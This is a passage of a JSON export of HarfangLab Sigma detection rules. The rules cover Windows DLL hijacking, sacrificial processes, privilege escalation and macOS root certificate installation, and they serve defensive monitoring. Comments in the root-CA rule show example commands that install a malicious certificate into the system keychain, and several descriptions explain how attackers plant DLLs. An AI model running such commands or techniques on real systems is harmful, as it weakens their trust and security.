of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "21699dd6-a401-4ab8-bbda-d513d587c561",
"rule_name": "Phantom DLL Hijacking via DeviceEnroller.exe",
"rule_description": "Detects potential Phantom DLL Hijacking via DeviceEnroller.exe.\nPhantom DLL Hijacking takes advantage of a non-existent DLL that a legitimate application tries to load.\nAttackers used this technique by copying a malicious DLL to System32 under the name ShellChromeAPI.dll, which is loaded by DeviceEnroller.exe if the parameter /PhoneDeepLink is present.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-08-30",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "2169b294-00f6-4185-922a-6e8744093010",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.627015Z",
"creation_date": "2026-03-23T11:45:34.627017Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.627021Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_002_dll_hijacking_obs_ffmpeg_mux.yml",
"content": "title: DLL Hijacking via obs-ffmpeg-mux.exe\nid: 2169b294-00f6-4185-922a-6e8744093010\ndescription: |\n Detects potential Windows DLL Hijacking via obs-ffmpeg-mux.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2025/01/08\nmodified: 2026/02/10\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessName: 'obs-ffmpeg-mux.exe'\n ProcessSignature: 'Hugh Bailey'\n ImageLoaded|endswith: '\\obs.dll'\n\n filter_legitimate_imageloaded:\n ImageLoaded|startswith: '?:\\Program Files\\obs-studio\\bin\\64bit\\'\n\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Hugh Bailey'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "2169b294-00f6-4185-922a-6e8744093010",
"rule_name": "DLL Hijacking via obs-ffmpeg-mux.exe",
"rule_description": "Detects potential Windows DLL Hijacking via obs-ffmpeg-mux.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate Windows-signed executable from System32 or SysWow64 to a non-standard directory and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2025-01-08",
"rule_modified_date": "2026-02-10",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "218a81a4-f938-453b-aa3e-57226b82c69c",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.074289Z",
"creation_date": "2026-03-23T11:45:34.074291Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.074295Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.todyl.com/blog/investigating-malicious-use-onenote-deploy-qbot",
"https://attack.mitre.org/techniques/T1055/"
],
"name": "t1055_sacrificial_process_atbroker.yml",
"content": "title: ATBroker.exe Sacrificial Process Spawned\nid: 218a81a4-f938-453b-aa3e-57226b82c69c\ndescription: |\n Detects the suspicious execution of the legitimate ATBroker.exe Windows binary, spawned without arguments and in an abnormal execution context.\n This can be indicative that the binary is being used as a sacrificial or hollowed process.\n Such processes are spawned and malicious code is immediately injected into them for nefarious purposes.\n It is recommended to investigate the parent process performing this action to determine the legitimacy of this behavior.\nreferences:\n - https://www.todyl.com/blog/investigating-malicious-use-onenote-deploy-qbot\n - https://attack.mitre.org/techniques/T1055/\ndate: 2025/09/02\nmodified: 2025/09/02\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.privilege_escalation\n - attack.t1055\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.SacrificialProcess\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.ProcessTampering\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n Image|endswith: '\\ATBroker.exe'\n CommandLine|endswith: '\\ATBroker.exe'\n ParentImage|contains: '?'\n\n filter_legitimate_parent:\n ParentImage: '?:\\Windows\\System32\\winlogon.exe'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "218a81a4-f938-453b-aa3e-57226b82c69c",
"rule_name": "ATBroker.exe Sacrificial Process Spawned",
"rule_description": "Detects the suspicious execution of the legitimate ATBroker.exe Windows binary, spawned without arguments and in an abnormal execution context.\nThis can be indicative that the binary is being used as a sacrificial or hollowed process.\nSuch processes are spawned and malicious code is immediately injected into them for nefarious purposes.\nIt is recommended to investigate the parent process performing this action to determine the legitimacy of this behavior.\n",
"rule_creation_date": "2025-09-02",
"rule_modified_date": "2025-09-02",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1055"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "21a54f04-8b55-4e87-95f8-60eaebb762b6",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.617275Z",
"creation_date": "2026-03-23T11:45:34.617277Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.617281Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md",
"https://attack.mitre.org/techniques/T1553/004/"
],
"name": "t1553_004_install_root_ca.yml",
"content": "title: Root Certificate Authority Installed\nid: 21a54f04-8b55-4e87-95f8-60eaebb762b6\ndescription: |\n Detects when a new root certificate authority is added to the macOS system keychain.\n Attackers may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.\n Root certificates are used in public key cryptography to identify a root certificate authority (CA).\n When a root certificate is installed, the system or application will trust certificates in the root's chain of trust that have been signed by the root certificate.\n Certificates are commonly used for establishing secure TLS/SSL communications within a web browser.\n When a user attempts to browse a website that presents a certificate that is not trusted an error message will be displayed to warn the user of the security risk.\n Depending on the security settings, the browser may not allow the user to establish a connection to the website.\n Installation of a root certificate on a compromised system would give an adversary a way to degrade the security of that system.\n It is recommended to investigate the process that added the certificate and the certificate itself to determine if this action was legitimate.\nreferences:\n - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md\n - https://attack.mitre.org/techniques/T1553/004/\ndate: 2022/08/29\nmodified: 2025/11/10\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1553.004\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.LOLBin.Security\n - classification.macOS.Behavior.DefenseEvasion\n - classification.macOS.Behavior.SystemModification\nlogsource:\n category: process_creation\n product: macos\ndetection:\n selection:\n # security add-trusted-cert -d -k \"/Library/Keychains/System.keychain\" \"/Users/user/maliciousCA.crt\"\n # security add-trusted-cert -d -r trustRoot -k 
\"/Library/Keychains/System.keychain\" \"/Users/user/maliciousCA.crt\"\n # security add-trusted-cert -d -r trustAsRoot -k \"/Library/Keychains/System.keychain\" \"/Users/user/maliciousCA.crt\"\n Image: '/usr/bin/security'\n CommandLine|contains|all:\n - 'add-trusted-cert'\n - '-d'\n - '-k'\n - '/Library/Keychains/System.keychain'\n exclusion_deny:\n # security add-trusted-cert -d -r deny -k \"/Library/Keychains/System.keychain\" \"/Users/user/untrustedCA.crt\"\n CommandLine|contains|all:\n - '-r'\n - 'deny'\n\n exclusion_autofirma:\n ProcessParentCommandLine|startswith: 'sudo -s security -i add-trusted-cert -d -r * -k /library/keychains/system.keychain /users/*/library/application support/autofirma/'\n\n exclusion_cloudflarewarp:\n ProcessParentImage: '/applications/cloudflare warp.app/contents/resources/cloudflarewarp'\n\n exclusion_olfeo:\n ProcessParentImage: '/usr/local/bin/trustlane_authentication_agent'\n\n exclusion_homebrew:\n ProcessGrandparentImage: '/opt/homebrew/Cellar/mkcert/*/bin/mkcert'\n\n exclusion_make:\n ProcessGrandparentImage:\n - '/Applications/Xcode.app/Contents/Developer/usr/bin/make'\n - '/Library/Developer/CommandLineTools/usr/bin/make'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "21a54f04-8b55-4e87-95f8-60eaebb762b6",
"rule_name": "Root Certificate Authority Installed",
"rule_description": "Detects when a new root certificate authority is added to the macOS system keychain.\nAttackers may install a root certificate on a compromised system to avoid warnings when connecting to adversary-controlled web servers.\nRoot certificates are used in public key cryptography to identify a root certificate authority (CA).\nWhen a root certificate is installed, the system or application will trust certificates in the root's chain of trust that have been signed by the root certificate.\nCertificates are commonly used for establishing secure TLS/SSL communications within a web browser.\nWhen a user attempts to browse a website that presents a certificate that is not trusted, an error message will be displayed to warn the user of the security risk.\nDepending on the security settings, the browser may not allow the user to establish a connection to the website.\nInstallation of a root certificate on a compromised system would give an adversary a way to degrade the security of that system.\nIt is recommended to investigate the process that added the certificate and the certificate itself to determine if this action was legitimate.\n",
"rule_creation_date": "2022-08-29",
"rule_modified_date": "2025-11-10",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1553.004"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "21a87deb-69d2-4659-9a98-c8d3b13dae95",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.097581Z",
"creation_date": "2026-03-23T11:45:34.097583Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.097587Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://wietze.github.io/blog/save-the-environment-variables",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_control.yml",
"content": "title: DLL Hijacking via CONTROL.exe\nid: 21a87deb-69d2-4659-9a98-c8d3b13dae95\ndescription: |\n Detects potential Windows DLL Hijacking via CONTROL.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://wietze.github.io/blog/save-the-environment-variables\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'CONTROL.EXE'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\explorerframe.dll'\n - '\\mswb7.dll'\n - '\\propsys.dll'\n - '\\shell32.dll'\n - '\\structuredquery.dll'\n - '\\windows.storage.dll'\n - '\\windows.storage.search.dll'\n - '\\edputil.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Program Files (x86)\\Google\\Chrome\\Application\\'\n - '?:\\Program Files (x86)\\Microsoft Office\\root\\Office*\\'\n - '?:\\Program Files (x86)\\Microsoft\\Edge\\Application\\'\n - '?:\\Program Files (x86)\\Mozilla Firefox\\'\n - '?:\\Program Files\\Google\\Chrome\\Application\\'\n - '?:\\Program Files\\Microsoft Office\\root\\Office*\\'\n - '?:\\Program Files\\Microsoft\\Edge\\Application\\'\n - 
'?:\\Program Files\\Mozilla Firefox\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "21a87deb-69d2-4659-9a98-c8d3b13dae95",
"rule_name": "DLL Hijacking via CONTROL.exe",
"rule_description": "Detects potential Windows DLL Hijacking via CONTROL.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "21b2686f-5620-4cbb-b0ba-f7ccc728e1f6",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.070008Z",
"creation_date": "2026-03-23T11:45:34.070010Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.070014Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://thedfirreport.com/2020/10/18/ryuk-in-5-hours/",
"https://attack.mitre.org/techniques/T1036/005/"
],
"name": "t1036_005_dll_load_from_perflogs_folder.yml",
"content": "title: DLL Loaded from PerfLogs Folder\nid: 21b2686f-5620-4cbb-b0ba-f7ccc728e1f6\ndescription: |\n Detects the suspicious loading of a DLL from the PerfLogs folder.\n This folder is an uncommon directory for DLL loading and is often abused by attackers.\n It is recommended to investigate the executed binary to determine its legitimacy.\nreferences:\n - https://thedfirreport.com/2020/10/18/ryuk-in-5-hours/\n - https://attack.mitre.org/techniques/T1036/005/\ndate: 2023/03/13\nmodified: 2025/01/28\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1036.005\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.Masquerading\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ImageLoaded|startswith: '?:\\PerfLogs\\'\n condition: selection\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "21b2686f-5620-4cbb-b0ba-f7ccc728e1f6",
"rule_name": "DLL Loaded from PerfLogs Folder",
"rule_description": "Detects the suspicious loading of a DLL from the PerfLogs folder.\nThis folder is an uncommon directory for DLL loading and is often abused by attackers.\nIt is recommended to investigate the executed binary to determine its legitimacy.\n",
"rule_creation_date": "2023-03-13",
"rule_modified_date": "2025-01-28",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1036.005"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "21c73ea5-e857-4d58-8795-052869485f7d",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.098193Z",
"creation_date": "2026-03-23T11:45:34.098195Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.098200Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.fortinet.com/blog/threat-research/pivnoxy-and-chinoxy-puppeteer-analysis",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_lbtwizgi.yml",
"content": "title: DLL Hijacking via LBTWizGi.exe\nid: 21c73ea5-e857-4d58-8795-052869485f7d\ndescription: |\n Detects potential Windows DLL Hijacking via LBTWizGi.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate Logitech executable alongside the malicious DLL.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.fortinet.com/blog/threat-research/pivnoxy-and-chinoxy-puppeteer-analysis\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/07\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'LBTWizGi.exe'\n ProcessSignature: 'Logitech Inc'\n ImageLoaded|endswith: '\\LBTServ.dll'\n\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Program Files\\Logitech\\setpointp\\'\n - '?:\\Program Files (x86)\\Logitech\\setpointp\\'\n\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Program Files\\Common Files\\Logitech\\Bluetooth\\'\n - '?:\\Program Files (x86)\\Common Files\\Logitech\\Bluetooth\\'\n - '?:\\Program Files\\Common Files\\LogiShrd\\Bluetooth\\'\n - '?:\\Program Files (x86)\\Common Files\\LogiShrd\\Bluetooth\\'\n\n filter_signature_imageloaded:\n Signed: 'true'\n Company|contains: 'Logitech'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "21c73ea5-e857-4d58-8795-052869485f7d",
"rule_name": "DLL Hijacking via LBTWizGi.exe",
"rule_description": "Detects potential Windows DLL Hijacking via LBTWizGi.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate Logitech executable alongside the malicious DLL.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-07",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "21db6605-c463-47b7-8f9f-b912e8fc55e9",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.598895Z",
"creation_date": "2026-03-23T11:45:34.598898Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.598905Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/itm4n/PrintSpoofer",
"https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/",
"https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment",
"https://attack.mitre.org/techniques/T1134/",
"https://attack.mitre.org/techniques/T1068/"
],
"name": "t1134_suspicious_child_process_integrity_level.yml",
"content": "title: Suspicious Child Process Integrity Level\nid: 21db6605-c463-47b7-8f9f-b912e8fc55e9\ndescription: |\n Detects a child process spawned with a SYSTEM integrity level by a parent with a lower one.\n This can be the result of an exploitation to elevate privilege to System level.\n For example, the PrintSpoofer exploitation, that abuses SeImpersonatePrivilege via Named Pipe Impersonation, can be used to achieve this type of privilege escalation.\n It is recommended to analyze both the parent process and the process itself to look for malicious content and subsequent malicious actions.\nreferences:\n - https://github.com/itm4n/PrintSpoofer\n - https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/\n - https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment\n - https://attack.mitre.org/techniques/T1134/\n - https://attack.mitre.org/techniques/T1068/\ndate: 2022/08/17\nmodified: 2025/10/09\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.t1134\n - attack.t1068\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.PrivilegeEscalation\n - classification.Windows.Behavior.Exploitation\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n Image|endswith:\n - '\\cmd.exe'\n - '\\powershell.exe'\n IntegrityLevel: 'System'\n\n filter_parent_system:\n ParentIntegrityLevel: 'System'\n\n exclusion_unknown:\n ParentIntegrityLevel:\n - 'Unknown'\n - ''\n\n exclusion_ansible:\n CommandLine|contains:\n - 'powershell.exe -NonInteractive -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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'\n - ' $msg = \"ANSIBLE_BOOTSTRAP_ERROR: $(ConvertTo-Json $result -Compress)\" Write-Host $msg exit -1 } }'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "21db6605-c463-47b7-8f9f-b912e8fc55e9",
"rule_name": "Suspicious Child Process Integrity Level",
"rule_description": "Detects a child process spawned with a SYSTEM integrity level by a parent with a lower one.\nThis can be the result of an exploit used to elevate privileges to SYSTEM level.\nFor example, the PrintSpoofer exploit, which abuses SeImpersonatePrivilege via named pipe impersonation, can be used to achieve this type of privilege escalation.\nIt is recommended to analyze both the parent process and the child process itself to look for malicious content and subsequent malicious actions.\n",
"rule_creation_date": "2022-08-17",
"rule_modified_date": "2025-10-09",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1068",
"attack.t1134"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "21e24d1c-fc56-4c13-937d-8036bd091278",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.597706Z",
"creation_date": "2026-03-23T11:45:34.597711Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.597722Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://www.malwarebytes.com/blog/threat-intelligence/2022/winnti-apt-group-docks-in-sri-lanka-for-new-campaign-final.pdf",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_logserver.yml",
